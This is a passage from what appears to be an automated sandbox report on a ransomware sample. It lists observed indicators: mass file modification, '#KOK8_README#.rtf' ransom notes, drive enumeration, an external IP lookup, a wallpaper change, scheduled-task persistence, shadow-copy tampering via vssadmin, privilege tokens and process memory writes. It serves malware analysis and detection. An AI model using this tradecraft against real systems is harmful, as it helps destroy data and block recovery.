941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JQHF6B80\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CJQLK5UF\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: QvFgQs9v64.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: QvFgQs9v64.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: QvFgQs9v64.exe File opened (read-only) \??\U: QvFgQs9v64.exe File opened (read-only) \??\V: QvFgQs9v64.exe File opened (read-only) \??\X: QvFgQs9v64.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: QvFgQs9v64.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: QvFgQs9v64.exe File opened (read-only) \??\H: QvFgQs9v64.exe File opened (read-only) \??\N: QvFgQs9v64.exe File opened (read-only) \??\T: QvFgQs9v64.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: QvFgQs9v64.exe File opened (read-only) \??\O: QvFgQs9v64.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\P: QvFgQs9v64.exe File opened (read-only) \??\I: QvFgQs9v64.exe File opened (read-only) \??\R: QvFgQs9v64.exe File opened (read-only) \??\S: QvFgQs9v64.exe File opened (read-only) \??\W: QvFgQs9v64.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\Z: QvFgQs9v64.exe File opened (read-only) \??\A: QvFgQs9v64.exe File opened (read-only) \??\G: QvFgQs9v64.exe File opened (read-only) \??\M: QvFgQs9v64.exe File opened (read-only) \??\Y: QvFgQs9v64.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Pg6QDL2X.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sv.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\manifest.json 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Chess\Chess.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\chkrzm.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoBeta.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\es-ES\Hearts.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\Hearts.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\ChkrRes.dll.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Minesweeper\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\StartPing.shtml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\chkrzm.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 772 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1320 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 772 powershell.exe 3012 QvFgQs9v64.exe 3012 QvFgQs9v64.exe 3012 QvFgQs9v64.exe 3012 QvFgQs9v64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3012 QvFgQs9v64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 772 powershell.exe Token: SeDebugPrivilege 3012 QvFgQs9v64.exe Token: SeLoadDriverPrivilege 3012 QvFgQs9v64.exe Token: SeBackupPrivilege 1588 vssvc.exe Token: SeRestorePrivilege 1588 vssvc.exe Token: SeAuditPrivilege 1588 vssvc.exe Token: SeTakeOwnershipPrivilege 1292 takeown.exe Token: SeTakeOwnershipPrivilege 860 takeown.exe Token: SeIncreaseQuotaPrivilege 3440 WMIC.exe Token: SeSecurityPrivilege 3440 WMIC.exe Token: SeTakeOwnershipPrivilege 3440 WMIC.exe Token: SeLoadDriverPrivilege 3440 WMIC.exe Token: SeSystemProfilePrivilege 3440 WMIC.exe Token: SeSystemtimePrivilege 3440 WMIC.exe Token: SeProfSingleProcessPrivilege 3440 WMIC.exe Token: SeIncBasePriorityPrivilege 3440 WMIC.exe Token: SeCreatePagefilePrivilege 3440 WMIC.exe Token: SeBackupPrivilege 3440 WMIC.exe Token: SeRestorePrivilege 3440 WMIC.exe Token: SeShutdownPrivilege 3440 WMIC.exe Token: SeDebugPrivilege 3440 WMIC.exe Token: SeSystemEnvironmentPrivilege 3440 WMIC.exe Token: SeRemoteShutdownPrivilege 3440 WMIC.exe Token: SeUndockPrivilege 3440 WMIC.exe Token: SeManageVolumePrivilege 3440 WMIC.exe Token: 33 3440 WMIC.exe Token: 34 3440 WMIC.exe Token: 35 3440 WMIC.exe Token: SeIncreaseQuotaPrivilege 3440 WMIC.exe Token: SeSecurityPrivilege 3440 WMIC.exe Token: SeTakeOwnershipPrivilege 3440 WMIC.exe Token: SeLoadDriverPrivilege 3440 WMIC.exe Token: SeSystemProfilePrivilege 3440 WMIC.exe Token: SeSystemtimePrivilege 3440 WMIC.exe Token: SeProfSingleProcessPrivilege 3440 WMIC.exe Token: SeIncBasePriorityPrivilege 3440 WMIC.exe Token: SeCreatePagefilePrivilege 3440 WMIC.exe Token: SeBackupPrivilege 3440 WMIC.exe Token: SeRestorePrivilege 3440 WMIC.exe Token: SeShutdownPrivilege 3440 WMIC.exe Token: SeDebugPrivilege 3440 WMIC.exe Token: SeSystemEnvironmentPrivilege 3440 WMIC.exe Token: SeRemoteShutdownPrivilege 3440 WMIC.exe Token: SeUndockPrivilege 3440 WMIC.exe Token: SeManageVolumePrivilege 3440 WMIC.exe Token: 33 3440 WMIC.exe Token: 34 3440 WMIC.exe Token: 35 3440 WMIC.exe Token: SeTakeOwnershipPrivilege 2724 takeown.exe Token: SeTakeOwnershipPrivilege 2900 takeown.exe Token: SeTakeOwnershipPrivilege 3156 takeown.exe Token: SeTakeOwnershipPrivilege 3032 takeown.exe Token: SeTakeOwnershipPrivilege 2232 takeown.exe Token: SeTakeOwnershipPrivilege 3204 takeown.exe Token: SeTakeOwnershipPrivilege 3288 takeown.exe Token: SeTakeOwnershipPrivilege 3244 takeown.exe Token: SeTakeOwnershipPrivilege 3348 takeown.exe Token: SeTakeOwnershipPrivilege 3404 takeown.exe Token: SeTakeOwnershipPrivilege 876 takeown.exe Token: SeTakeOwnershipPrivilege 1052 takeown.exe Token: SeTakeOwnershipPrivilege 2328 takeown.exe Token: SeTakeOwnershipPrivilege 2388 takeown.exe Token: SeTakeOwnershipPrivilege 1656 takeown.exe Token: SeTakeOwnershipPrivilege 1704 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2908 wrote to memory of 2792 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2908 wrote to memory of 2792 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2908 wrote to memory of 2792 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2908 wrote to memory of 2792 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2908 wrote to memory of 2616 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2908 wrote to memory of 2616 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2908 wrote to memory of 2616 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2908 wrote to memory of 2616 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2908 wrote to memory of 528 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2908 wrote to memory of 528 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2908 wrote to memory of 528 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2908 wrote to memory of 528 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 528 wrote to memory of 772 528 cmd.exe 35 PID 528 wrote to memory of 772 528 cmd.exe 35 PID 528 wrote to memory of 772 528 cmd.exe 35 PID 528 wrote to memory of 772 528 cmd.exe 35 PID 2908 wrote to memory of 2508 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2908 wrote to memory of 2508 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2908 wrote to memory of 2508 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2908 wrote to memory of 2508 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2908 wrote to memory of 1028 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2908 wrote to memory of 1028 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2908 wrote to memory of 1028 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2908 wrote to memory of 1028 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2508 wrote to memory of 1860 2508 cmd.exe 40 PID 2508 wrote to memory of 1860 2508 cmd.exe 40 PID 2508 wrote to memory of 1860 2508 cmd.exe 40 PID 2508 wrote to memory of 1860 2508 cmd.exe 40 PID 1028 wrote to memory of 2704 1028 cmd.exe 41 PID 1028 wrote to memory of 2704 1028 cmd.exe 41 PID 1028 wrote to memory of 2704 1028 cmd.exe 41 PID 1028 wrote to memory of 2704 1028 cmd.exe 41 PID 2508 wrote to memory of 1692 2508 cmd.exe 42 PID 2508 wrote to memory of 1692 2508 cmd.exe 42 PID 2508 wrote to memory of 1692 2508 cmd.exe 42 PID 2508 wrote to memory of 1692 2508 cmd.exe 42 PID 2908 wrote to memory of 2448 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 43 PID 2908 wrote to memory of 2448 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 43 PID 2908 wrote to memory of 2448 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 43 PID 2908 wrote to memory of 2448 2908 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 43 PID 2448 wrote to memory of 1036 2448 cmd.exe 45 PID 2448 wrote to memory of 1036 2448 cmd.exe 45 PID 2448 wrote to memory of 1036 2448 cmd.exe 45 PID 2448 wrote to memory of 1036 2448 cmd.exe 45 PID 2508 wrote to memory of 1660 2508 cmd.exe 46 PID 2508 wrote to memory of 1660 2508 cmd.exe 46 PID 2508 wrote to memory of 1660 2508 cmd.exe 46 PID 2508 wrote to memory of 1660 2508 cmd.exe 46 PID 2448 wrote to memory of 560 2448 cmd.exe 47 PID 2448 wrote to memory of 560 2448 cmd.exe 47 PID 2448 wrote to memory of 560 2448 cmd.exe 47 PID 2448 wrote to memory of 560 2448 cmd.exe 47 PID 2704 wrote to memory of 1280 2704 wscript.exe 48 PID 2704 wrote to memory of 1280 2704 wscript.exe 48 PID 2704 wrote to memory of 1280 2704 wscript.exe 48 PID 2704 wrote to memory of 1280 2704 wscript.exe 48 PID 2448 wrote to memory of 2528 2448 cmd.exe 50 PID 2448 wrote to memory of 2528 2448 cmd.exe 50 PID 2448 wrote to memory of 2528 2448 cmd.exe 